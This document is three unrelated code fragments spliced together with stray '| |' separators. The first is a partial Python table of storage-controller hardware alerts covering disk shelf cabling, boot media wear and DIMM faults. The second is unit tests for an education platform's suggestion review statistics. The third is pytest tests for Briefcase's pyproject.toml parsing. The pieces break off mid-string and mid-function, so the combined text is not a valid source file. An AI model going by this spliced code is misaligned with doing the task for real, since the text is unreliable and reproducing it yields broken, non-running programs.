'CorrectiveActions': '1. Reseat disk $(storage_node_disk.disk-n'
'ame) following the rules in the Installat'
'ion and Service Guide.2. Wait six minutes'
' for the alert condition to clear.3. If '
'reseating disk $(storage_node_disk.disk-n'
'ame) fails to clear the alert condition, '
'replace disk $(storage_node_disk.disk-name'
').4. Wait six minutes for the alert condi'
'tion to clear.5. Contact support personne'
'l if the alert persists.'},
'SqrToSqrOrCirToCirPortConnection_Alert': {
'severityofAlert': 'Major',
'probableCause': 'Cable_tamper',
'description': 'Shelf-to-shelf connection between disk shelves'
' $(storage_node_shelf_connector.shelf) and $(s'
'torage_node_shelf_connector.remote-shelf) have'
' $(storage_node_shelf_connector.module-type) s'
'quare to square ports or circle to circle port'
's cabled together.',
'PossibleEffect': 'Connection between disk shelves $(storage_n'
'ode_shelf_connector.shelf) and $(storage_no'
'de_shelf_connector.remote-shelf) might be i'
'nactive and cause controller $(LOCALHOST) t'
'o lose connectivity to the shelves.',
'CorrectiveActions': '1. Consult the guide applicable to your '
'$(storage_node_shelf_connector.module-ty'
'pe) disk shelf to review cabling rules a'
'nd complete the SAS cabling worksheet for'
' your system.2. Connect disk shelf $(sto'
'rage_node_shelf_connector.shelf) square '
'port to disk shelf $(storage_node_shelf'
'_connector.remote-shelf) circle port.3.'
' Verify that IOM A of disk shelf $(stor'
'age_node_shelf_connector.shelf) is conn'
'ected to IOM A of disk shelf $(storage_'
'node_shelf_connector.remote-shelf).4. V'
'erify that IOM B of disk shelf $(storag'
'e_node_shelf_connector.shelf) is connect'
'ed to IOM B of disk shelf $(storage_nod'
'e_shelf_connector.remote-shelf).5. Cont'
'act support personnel if the alert pers'
'ists.'},
'StorageFCAdapterFault_Alert': {
'severityofAlert': 'Major',
'probableCause': 'Cable_tamper',
'description': 'FC initiator adapter $(mcc_nhm_storage_fc_ada'
'pter.name) is at fault.',
'PossibleEffect': 'Resiliency of backend storage is compromis'
'ed.',
'CorrectiveActions': '1. Ensure that the FC initiator link ha'
's not been tampered with.2. Verify the '
'operational status of the FC initiator'
' adapter by using the command "system '
'node run -node local -command storage'
' show adapter".'},
'ThreePathToStack_Alert': {
'severityofAlert': 'Major',
'probableCause': 'Cable_tamper',
'description': 'Controller $(LOCALHOST) has only $(storage_no'
'de_stack.path-count) paths to stack $(storage'
'_node_stack.stack-id).',
'PossibleEffect': 'Only multipath or quad-path configurations'
' are supported for IOM12 stacks.',
'CorrectiveActions': '1. Consult the guide applicable to your'
' $(storage_node_stack.module-type) disk'
' shelf to review cabling rules and comp'
'lete the SAS cabling worksheet for your'
' system.2. Connect controller $(LOCALHO'
'ST) to stack $(storage_node_stack.stack-'
'id) using a multipath or quad-path config'
'uration.3. Contact support personnel if '
'the alert persists.'},
'UnsupportedMixOfIOM12andIOM6Shelves_Alert': {
'severityofAlert': 'Major',
'probableCause': 'Cable_tamper',
'description': 'Cabling together disk shelves $(storage_node_'
'shelf_connector.shelf) of $(storage_node_shelf'
'_connector.module-type) and $(storage_node_she'
'lf_connector.remote-shelf) of $(storage_node_'
'shelf_connector.remote-module-type) is not su'
'pported.',
'PossibleEffect': 'Devices might not be accessible by the cont'
'roller.',
'CorrectiveActions': '1. Consult the guide applicable to your '
'$(storage_node_shelf_connector.module-type) disk shelf to revi'
'ew cabling rules and complete the SAS cab'
'ling worksheet for your system.2. Connect'
' disk shelf $(storage_node_shelf_connector'
'.shelf) only to other $(storage_node_shelf'
'_connector.module-type) disk shelves in a '
'stack.3. Connect disk shelf $(storage_node'
'_shelf_connector.remote-shelf) only to ot'
'her $(storage_node_shelf_connector.remote'
'-module-type) disk shelves in a separate'
' stack.4. Contact support personnel if th'
'e alert persists.'},
'BootMediaMissingAlert': {
'severityofAlert': 'Minor',
'probableCause': 'Configuration_error',
'description': 'Node"$(nphm_boot_media_count.display-name)" sup'
'ports 2 boot media devices, but less than 2 boo'
't media devices have been detected.',
'PossibleEffect': 'Boot media is not currently redundant.',
'CorrectiveActions': '1. Halt the node. 2. Verify that both b'
'oot media devices are present and reseat them.3. Reboot the nod'
'e.4. If the problem persists, contact techn'
'ical support for further assistance.'},
'BootmediaReplaceAlert': {
'severityofAlert': 'Critical',
'probableCause': 'hardware_degrading',
'description': 'Bad sector count in the boot media has reached c'
'ritical level.',
'PossibleEffect': 'Upgrading, downgrading, reverting, or applyin'
'g patches to Data ONTAP can damage the boot d'
'evice. If the boot device is damaged, the sto'
'rage system will not boot.',
'CorrectiveActions': '1. Contact technical support to obtain a n'
'ew boot device.2. If possible, perform a ta'
'keover of this node and bring the node down'
' for maintenance.3. Refer to the "Boot medi'
'a replacement guide for your given hardware'
' platform" to replace the boot device.4. Up'
'date the boot device with the appropriate'
' Da'
'ta ONTAP version. 5. Bring the storage syst'
'em online.'},
'BootmediaWarnAlert': {
'severityofAlert': 'Major',
'probableCause': 'hardware_degrading',
'description': 'Boot device is wearing out due to write operatio'
'ns in the form of regular updates.',
'PossibleEffect': 'Upgrading, downgrading, reverting, or applyi'
'ng patches to Data ONTAP can cause addition'
'al wear to the boot device. The boot device'
' might enter critical condition due to the '
'additional wear.',
'CorrectiveActions': '1. Contact technical support to obtain '
'a new boot device.2. If possible, perfo'
'rm a takeover of this node and bring th'
'e node down for maintenance.3. Refer to'
' the "Boot media replacement guide for '
'your given hardware platform" to replac'
'e the boot device.4. Update the boot de'
'vice with the appropriate Data ONTAP ver'
'sion. 5. Bring the storage system online.'},
'CriticalCECCCountMemErrAlert': {
'severityofAlert': 'Critical',
'probableCause': 'DIMM_Degraded',
'description': 'The DIMM has degraded, leading to memory error'
's.',
'PossibleEffect': 'Memory issues can lead to a catastrophic sy'
'stem panic, which can lead to data downtim'
'e on the node.',
'CorrectiveActions': '1. Contact technical support to obtain '
'a new DIMM of the same specification.2.'
' If possible, perform a takeover of this'
' node and bring the node down for maint'
'enance.3. Refer to the DIMM replacement'
' guide for your given hardware platform'
' to replace the DIMM.4. Bring the stora'
'ge system online.'},
'IOXMBadPowerSignalAlert': {
'severityofAlert': 'Major',
'probableCause': 'hardware_degradation',
'description': 'One or more power rails on the I/O expansion'
' module (IOXM) deteriorated.',
'PossibleEffect': 'Devices on the IOXM might not work when th'
'e IOXM is in degraded mode.',
'CorrectiveActions': '1. Contact technical support to get new'
' IOXM that is compatible with your plat'
'form.2. If possible, perform a takeove'
'r of this node and bring the node down'
' for maintenance.3. Replace the IOXM. '
'Refer to the Hardware specification g'
'uide for more information on the posi'
'tion of the FRU and ways to check or '
'replace it.4. Bring the storage system'
' online.5. If the problem persists, c'
'ontact technical support to get the c'
'hassis replaced.'},
'NodeClusFlapWarnAlert': {
'severityofAlert': 'Major',
'probableCause': 'Threshold_crossed',
'description': 'The number of link flapping errors on port "$('
'nphm_clus_flaps_info.display-name)" is above '
'the warning threshold of "$(nphm_clus_flaps_'
'info.threshold)" for the polling period.',
'PossibleEffect': 'Communication from this node to the cluster '
'might be degraded.',
'CorrectiveActions': '1) Migrate any cluster LIF that uses '
'this link to another port connected '
'to a cluster | |
self):
edit_state_content_suggestion = (
self._create_edit_state_content_suggestion())
suggestion_services.reject_suggestion(
edit_state_content_suggestion.suggestion_id, self.reviewer_id,
'review message')
self._assert_community_contribution_stats_is_in_default_state()
# Change the new_value of the html of the suggestion that got rejected
# so we can resubmit the suggestion for review.
resubmit_suggestion_change = edit_state_content_suggestion.change
resubmit_suggestion_change.new_value['html'] = 'new html to resubmit'
# Resubmit the rejected "edit state content" suggestion.
suggestion_services.resubmit_rejected_suggestion(
edit_state_content_suggestion.suggestion_id,
'resubmit summary message', self.author_id,
resubmit_suggestion_change)
self._assert_community_contribution_stats_is_in_default_state()
def test_create_question_suggestion_increases_question_suggestion_count(
self):
self._create_question_suggestion()
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 1)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code, {})
def test_create_multi_question_suggestions_increases_question_count(self):
self._create_question_suggestion()
self._create_question_suggestion()
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 2)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code, {})
def test_accept_question_suggestion_decreases_question_suggestion_count(
self):
question_suggestion = self._create_question_suggestion()
# Assert that the question suggestion count increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 1)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code, {})
suggestion_services.accept_suggestion(
question_suggestion.suggestion_id, self.reviewer_id,
self.COMMIT_MESSAGE, 'review message')
self._assert_community_contribution_stats_is_in_default_state()
def test_reject_question_suggestion_decreases_question_suggestion_count(
self):
question_suggestion = self._create_question_suggestion()
# Assert that the question suggestion count increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 1)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code, {})
suggestion_services.reject_suggestion(
question_suggestion.suggestion_id, self.reviewer_id,
'review message')
self._assert_community_contribution_stats_is_in_default_state()
def test_reject_question_suggestions_decreases_question_suggestion_count(
self):
question_suggestion_1 = self._create_question_suggestion()
question_suggestion_2 = self._create_question_suggestion()
# Assert that the question suggestion count increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 2)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code, {})
suggestion_services.reject_suggestions(
[
question_suggestion_1.suggestion_id,
question_suggestion_2.suggestion_id
], self.reviewer_id, 'review message')
self._assert_community_contribution_stats_is_in_default_state()
def test_resubmit_question_suggestion_increases_question_suggestion_count(
self):
question_suggestion = self._create_question_suggestion()
# Assert that the question suggestion count increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 1)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code, {})
suggestion_services.reject_suggestion(
question_suggestion.suggestion_id, self.reviewer_id,
'review message')
# Assert that the question suggestion decreased because the suggestion
# was rejected.
self._assert_community_contribution_stats_is_in_default_state()
# Change the question_dict of the question suggestion that got rejected
# so we can resubmit the suggestion for review.
resubmit_question_change = question_suggestion.change
resubmit_question_change.question_dict['linked_skill_ids'] = ['skill1']
# Resubmit the rejected question suggestion.
suggestion_services.resubmit_rejected_suggestion(
question_suggestion.suggestion_id, 'resubmit summary message',
self.author_id, resubmit_question_change
)
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 1)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code, {})
def test_create_translation_suggestion_raises_translation_suggestion_count(
self):
self._create_translation_suggestion_with_language_code(
self.language_code)
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 0)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code,
{self.language_code: 1})
def test_create_translation_suggestions_diff_lang_raises_translation_counts(
self):
self._create_translation_suggestion_with_language_code('hi')
self._create_translation_suggestion_with_language_code('en')
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 0)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code,
{'hi': 1, 'en': 1})
def test_create_translation_suggestions_eq_lang_increases_translation_count(
self):
self._create_translation_suggestion_with_language_code('hi')
self._create_translation_suggestion_with_language_code('hi')
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 0)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code, {'hi': 2})
def test_accept_translation_suggestion_lowers_translation_suggestion_count(
self):
translation_suggestion = (
self._create_translation_suggestion_with_language_code(
self.language_code))
# Assert that the translation suggestion count increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 0)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code,
{self.language_code: 1})
suggestion_services.accept_suggestion(
translation_suggestion.suggestion_id, self.reviewer_id,
self.COMMIT_MESSAGE, 'review message')
self._assert_community_contribution_stats_is_in_default_state()
def test_reject_translation_suggestion_lowers_translation_suggestion_count(
self):
translation_suggestion = (
self._create_translation_suggestion_with_language_code(
self.language_code))
# Assert that the translation suggestion count increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 0)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code,
{self.language_code: 1})
suggestion_services.reject_suggestion(
translation_suggestion.suggestion_id, self.reviewer_id,
'review message')
self._assert_community_contribution_stats_is_in_default_state()
def test_reject_one_translation_suggestion_diff_lang_lowers_only_one_count(
self):
translation_suggestion_1 = (
self._create_translation_suggestion_with_language_code('hi'))
# Create a translation suggestion in a different language that won't be
# rejected.
self._create_translation_suggestion_with_language_code('en')
# Assert that the translation suggestion count increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 0)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code,
{'hi': 1, 'en': 1})
suggestion_services.reject_suggestion(
translation_suggestion_1.suggestion_id, self.reviewer_id,
'review message')
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 0)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code, {'en': 1})
def test_reject_translation_suggestions_diff_lang_lowers_translation_count(
self):
translation_suggestion_1 = (
self._create_translation_suggestion_with_language_code('hi'))
translation_suggestion_2 = (
self._create_translation_suggestion_with_language_code('en'))
# Assert that the translation suggestion count increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 0)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code,
{'hi': 1, 'en': 1})
suggestion_services.reject_suggestions(
[
translation_suggestion_1.suggestion_id,
translation_suggestion_2.suggestion_id
], self.reviewer_id, 'review message')
self._assert_community_contribution_stats_is_in_default_state()
def test_reject_translation_suggestions_same_lang_lowers_translation_count(
self):
translation_suggestion_1 = (
self._create_translation_suggestion_with_language_code(
self.language_code))
translation_suggestion_2 = (
self._create_translation_suggestion_with_language_code(
self.language_code))
# Assert that the translation suggestion count increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 0)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code,
{self.language_code: 2})
suggestion_services.reject_suggestions(
[
translation_suggestion_1.suggestion_id,
translation_suggestion_2.suggestion_id
], self.reviewer_id, 'review message')
self._assert_community_contribution_stats_is_in_default_state()
def test_reject_suggestions_diff_type_decreases_suggestion_counts(self):
suggestion_1 = (
self._create_translation_suggestion_with_language_code('hi'))
suggestion_2 = (
self._create_translation_suggestion_with_language_code('en'))
suggestion_3 = self._create_edit_state_content_suggestion()
suggestion_4 = self._create_question_suggestion()
# Assert that the suggestion counts increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 1)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code,
{'hi': 1, 'en': 1})
suggestion_services.reject_suggestions(
[
suggestion_1.suggestion_id, suggestion_2.suggestion_id,
suggestion_3.suggestion_id, suggestion_4.suggestion_id
], self.reviewer_id, 'review message')
self._assert_community_contribution_stats_is_in_default_state()
def test_create_suggestions_diff_type_increases_suggestion_counts(self):
self._create_translation_suggestion_with_language_code('hi')
self._create_translation_suggestion_with_language_code('en')
self._create_question_suggestion()
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 1)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code,
{'hi': 1, 'en': 1})
class GetSuggestionsWaitingTooLongForReviewInfoForAdminsUnitTests(
test_utils.GenericTestBase):
"""Test the ability of the
get_info_about_suggestions_waiting_too_long_for_review method in suggestion
services, which is used to retrieve the information required to notify
admins if there are suggestions that have waited longer than
suggestion_models.SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS days for a
review on the Contributor Dashboard.
"""
target_id = 'exp1'
skill_id = 'skill_123456'
language_code = 'en'
AUTHOR_EMAIL = '<EMAIL>'
REVIEWER_1_EMAIL = '<EMAIL>'
REVIEWER_2_EMAIL = '<EMAIL>'
COMMIT_MESSAGE = 'commit message'
mocked_datetime_utcnow = datetime.datetime(2020, 6, 15, 5)
def _create_translation_suggestion(self):
"""Creates a translation suggestion."""
add_translation_change_dict = {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': feconf.DEFAULT_INIT_STATE_NAME,
'content_id': feconf.DEFAULT_NEW_STATE_CONTENT_ID,
'language_code': self.language_code,
'content_html': feconf.DEFAULT_INIT_STATE_CONTENT_STR,
'translation_html': '<p>This is the translated content.</p>'
}
return suggestion_services.create_suggestion(
suggestion_models.SUGGESTION_TYPE_TRANSLATE_CONTENT,
suggestion_models.TARGET_TYPE_EXPLORATION,
self.target_id, feconf.CURRENT_STATE_SCHEMA_VERSION,
self.author_id, add_translation_change_dict,
'test description'
)
def _create_question_suggestion(self):
"""Creates a question suggestion."""
add_question_change_dict = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': self.language_code,
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_1'],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
},
'skill_id': self.skill_id,
'skill_difficulty': 0.3
}
return suggestion_services.create_suggestion(
suggestion_models.SUGGESTION_TYPE_ADD_QUESTION,
suggestion_models.TARGET_TYPE_SKILL,
self.skill_id, feconf.CURRENT_STATE_SCHEMA_VERSION,
self.author_id, add_question_change_dict,
'test description'
)
def _create_reviewable_suggestion_email_infos_from_suggestions(
self, suggestions):
"""Creates a list of ReviewableSuggestionEmailInfo objects from
the given suggestions.
"""
return [
(
suggestion_services
.create_reviewable_suggestion_email_info_from_suggestion(
suggestion)
) for suggestion in suggestions
]
def _assert_reviewable_suggestion_email_infos_are_in_correct_order(
self, reviewable_suggestion_email_infos,
expected_reviewable_suggestion_email_infos):
"""Asserts that the reviewable suggestion email infos are equal to the
expected reviewable suggestion email infos and that the reviewable
suggestion email infos are sorted in descending order according to
review wait time.
"""
self.assertEqual(
len(reviewable_suggestion_email_infos),
len(expected_reviewable_suggestion_email_infos)
)
for index, reviewable_suggestion_email_info in enumerate(
reviewable_suggestion_email_infos):
self.assertEqual(
reviewable_suggestion_email_info.suggestion_type,
expected_reviewable_suggestion_email_infos[
index].suggestion_type)
self.assertEqual(
reviewable_suggestion_email_info.language_code,
expected_reviewable_suggestion_email_infos[
index].language_code)
self.assertEqual(
reviewable_suggestion_email_info.suggestion_content,
expected_reviewable_suggestion_email_infos[
index].suggestion_content)
self.assertEqual(
reviewable_suggestion_email_info.submission_datetime,
expected_reviewable_suggestion_email_infos[
index].submission_datetime)
for index in python_utils.RANGE(
len(reviewable_suggestion_email_infos) - 1):
self.assertLess(
reviewable_suggestion_email_infos[index].submission_datetime,
reviewable_suggestion_email_infos[
index + 1].submission_datetime
)
def setUp(self):
super(
GetSuggestionsWaitingTooLongForReviewInfoForAdminsUnitTests,
self).setUp()
self.signup(self.AUTHOR_EMAIL, 'author')
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.signup(self.REVIEWER_1_EMAIL, 'reviewer1')
self.reviewer_1_id = self.get_user_id_from_email(
self.REVIEWER_1_EMAIL)
self.signup(self.REVIEWER_2_EMAIL, 'reviewer2')
self.reviewer_2_id = self.get_user_id_from_email(
self.REVIEWER_2_EMAIL)
self.save_new_valid_exploration(self.target_id, self.author_id)
self.save_new_skill(self.skill_id, self.author_id)
def test_get_returns_empty_for_suggestion_type_not_on_contributor_dashboard(
self):
self._create_translation_suggestion()
# This mocked list cannot be empty because then the storage query in the
# get_suggestions_waiting_too_long_for_review method will fail.
mocked_contributor_dashboard_suggestion_types = [
suggestion_models.SUGGESTION_TYPE_ADD_QUESTION]
with self.swap(
suggestion_models, 'CONTRIBUTOR_DASHBOARD_SUGGESTION_TYPES',
mocked_contributor_dashboard_suggestion_types):
with self.swap(
suggestion_models,
'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS', 0):
info_about_suggestions_waiting_too_long_for_review = (
suggestion_services
.get_info_about_suggestions_waiting_too_long_for_review()
)
self.assertEqual(
len(info_about_suggestions_waiting_too_long_for_review), 0)
def test_get_returns_empty_if_suggestion_review_wait_time_diff_is_negative(
self):
self._create_translation_suggestion()
# Make sure the threshold is nonzero.
with self.swap(
suggestion_models,
'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS', 1):
info_about_suggestions_waiting_too_long_for_review = (
suggestion_services
.get_info_about_suggestions_waiting_too_long_for_review()
)
self.assertEqual(
len(info_about_suggestions_waiting_too_long_for_review), 0)
def test_get_returns_empty_if_suggestions_have_waited_less_than_threshold(
self):
with self.mock_datetime_utcnow(self.mocked_datetime_utcnow):
self._create_translation_suggestion()
self._create_question_suggestion()
mocked_threshold_review_wait_time_in_days = 2
mocked_datetime_less_than_review_wait_time_threshold = (
self.mocked_datetime_utcnow + datetime.timedelta(days=1))
with self.mock_datetime_utcnow(
mocked_datetime_less_than_review_wait_time_threshold):
with self.swap(
suggestion_models,
'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS',
mocked_threshold_review_wait_time_in_days):
info_about_suggestions_waiting_too_long_for_review = (
suggestion_services
.get_info_about_suggestions_waiting_too_long_for_review()
)
self.assertEqual(
len(info_about_suggestions_waiting_too_long_for_review), 0)
def test_get_returns_empty_if_suggestions_have_waited_threshold_review_time(
self):
with self.mock_datetime_utcnow(self.mocked_datetime_utcnow):
self._create_translation_suggestion()
mocked_threshold_review_wait_time_in_days = 2
mocked_datetime_eq_review_wait_time_threshold = (
self.mocked_datetime_utcnow + datetime.timedelta(
days=mocked_threshold_review_wait_time_in_days))
with self.mock_datetime_utcnow(
mocked_datetime_eq_review_wait_time_threshold):
with self.swap(
suggestion_models,
'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS',
mocked_threshold_review_wait_time_in_days):
info_about_suggestions_waiting_too_long_for_review = (
suggestion_services
.get_info_about_suggestions_waiting_too_long_for_review()
)
self.assertEqual(
len(info_about_suggestions_waiting_too_long_for_review), 0)
def test_get_returns_suggestion_waited_long_if_their_wait_is_past_threshold(
self):
with self.mock_datetime_utcnow(self.mocked_datetime_utcnow):
translation_suggestion = self._create_translation_suggestion()
# Give the question suggestion a slightly different review submission
# time so that the suggestions are not indistinguishable, in terms of
# their review submission time.
with self.mock_datetime_utcnow(
self.mocked_datetime_utcnow + datetime.timedelta(minutes=5)):
question_suggestion = self._create_question_suggestion()
expected_suggestion_email_infos = (
self._create_reviewable_suggestion_email_infos_from_suggestions(
[translation_suggestion, question_suggestion]))
mocked_threshold_review_wait_time_in_days = 1
mocked_datetime_past_review_wait_time_threshold = (
self.mocked_datetime_utcnow + datetime.timedelta(days=2))
with self.mock_datetime_utcnow(
mocked_datetime_past_review_wait_time_threshold):
with self.swap(
suggestion_models,
'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS',
mocked_threshold_review_wait_time_in_days):
info_about_suggestions_waiting_too_long_for_review = (
suggestion_services
.get_info_about_suggestions_waiting_too_long_for_review()
)
self.assertEqual(
len(info_about_suggestions_waiting_too_long_for_review), 2)
self._assert_reviewable_suggestion_email_infos_are_in_correct_order(
info_about_suggestions_waiting_too_long_for_review,
expected_suggestion_email_infos
)
def test_get_only_returns_suggestions_that_have_waited_past_wait_threshold(
self):
with self.mock_datetime_utcnow(self.mocked_datetime_utcnow):
translation_suggestion = self._create_translation_suggestion()
with self.mock_datetime_utcnow(
self.mocked_datetime_utcnow + datetime.timedelta(days=2)):
self._create_question_suggestion()
expected_suggestion_email_infos = (
self._create_reviewable_suggestion_email_infos_from_suggestions(
[translation_suggestion]))
mocked_threshold_review_wait_time_in_days = 3
mocked_datetime_past_review_wait_time_threshold = (
self.mocked_datetime_utcnow + datetime.timedelta(days=4))
with self.mock_datetime_utcnow(
mocked_datetime_past_review_wait_time_threshold):
with self.swap(
suggestion_models,
'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS',
mocked_threshold_review_wait_time_in_days):
info_about_suggestions_waiting_too_long_for_review = (
suggestion_services
.get_info_about_suggestions_waiting_too_long_for_review()
)
# The question suggestion was created 2 days after the translation
# suggestion, so it has only waited 1 day for a review, which is less
# than 3, the mocked review wait time threshold. Therefore, only the
# translation suggestion has waited too long for review.
self.assertEqual(
len(info_about_suggestions_waiting_too_long_for_review), 1)
self._assert_reviewable_suggestion_email_infos_are_in_correct_order(
info_about_suggestions_waiting_too_long_for_review,
expected_suggestion_email_infos
)
class GetSuggestionTypesThatNeedReviewersUnitTests(test_utils.GenericTestBase):
"""Tests for the get_suggestion_types_that_need_reviewers method."""
sample_language_code = 'en'
target_id = 'exp1'
skill_id = 'skill_123456'
language_code = 'en'
AUTHOR_EMAIL = '<EMAIL>'
REVIEWER_EMAIL = '<EMAIL>'
def _create_translation_suggestion_with_language_code(self, language_code):
"""Creates a translation suggestion in the given | |
from io import StringIO
import pytest
from briefcase.config import parse_config
from briefcase.exceptions import BriefcaseConfigError
def test_invalid_toml():
"If the config file isn't TOML, raise an error"
config_file = StringIO("this is not toml!")
with pytest.raises(BriefcaseConfigError, match="Invalid pyproject.toml"):
parse_config(config_file, platform='macOS', output_format='app')
def test_no_briefcase_section():
"If the config file doesn't contain a briefcase tool section, raise an error"
config_file = StringIO(
"""
[tool.section]
name="value"
number=42
"""
)
with pytest.raises(BriefcaseConfigError, match="No tool.briefcase section"):
parse_config(config_file, platform='macOS', output_format='app')
def test_no_apps():
"If the config file doesn't contain at least one briefcase app, raise an error"
config_file = StringIO(
"""
[tool.briefcase]
name="value"
number=42
"""
)
with pytest.raises(BriefcaseConfigError, match="No Briefcase apps defined"):
parse_config(config_file, platform='macOS', output_format='app')
def test_single_minimal_app():
"A single app can be defined, but can exist without any app attributes"
config_file = StringIO(
"""
[tool.briefcase]
value = 42
[tool.briefcase.app.my_app]
"""
)
global_options, apps = parse_config(config_file, platform='macOS', output_format='app')
# There's a single global option
assert global_options == {
'value': 42
}
# The app gets the name from it's header line.
# It inherits the value from the base definition.
assert apps == {
'my_app': {
"app_name": "my_app",
"value": 42
}
}
def test_multiple_minimal_apps():
"The configuration can contain multiple apps without an explicit tool header"
config_file = StringIO(
"""
[tool.briefcase.app.first]
number=37
[tool.briefcase.app.second]
app_name="my_app"
number=42
"""
)
global_options, apps = parse_config(config_file, platform='macOS', output_format='app')
# There are no global options
assert global_options == {}
# The apps gets their name from the header lines.
# The second tool overrides it's app name
assert apps == {
'first': {
"app_name": "first",
"number": 37,
},
'second': {
"app_name": "my_app",
"number": 42,
},
}
def test_platform_override():
"An app can define platform settings that override base settings"
config_file = StringIO(
"""
[tool.briefcase]
value = 0
basevalue = "the base"
[tool.briefcase.app.my_app]
value = 1
appvalue = "the app"
[tool.briefcase.app.my_app.macOS]
value = 2
platformvalue = "macos platform"
[tool.briefcase.app.my_app.linux]
value = 3
platformvalue = "linux platform"
[tool.briefcase.app.other_app.macOS]
value = 4
platformvalue = "other macos platform"
"""
)
global_options, apps = parse_config(config_file, platform='macOS', output_format='app')
# The global options are exactly as specified
assert global_options == {
'value': 0,
'basevalue': 'the base',
}
# Since a macOS app has been requested, the macOS platform values
# take priority. Linux configuration values are dropped.
# The second app doesn't provide an explicit app-level config, but
# the app exists because the platform exists.
# Platforms should be processed in sorted order, which means that linux
# will be processed before macos.
assert apps == {
'my_app': {
"app_name": "my_app",
"value": 2,
"basevalue": "the base",
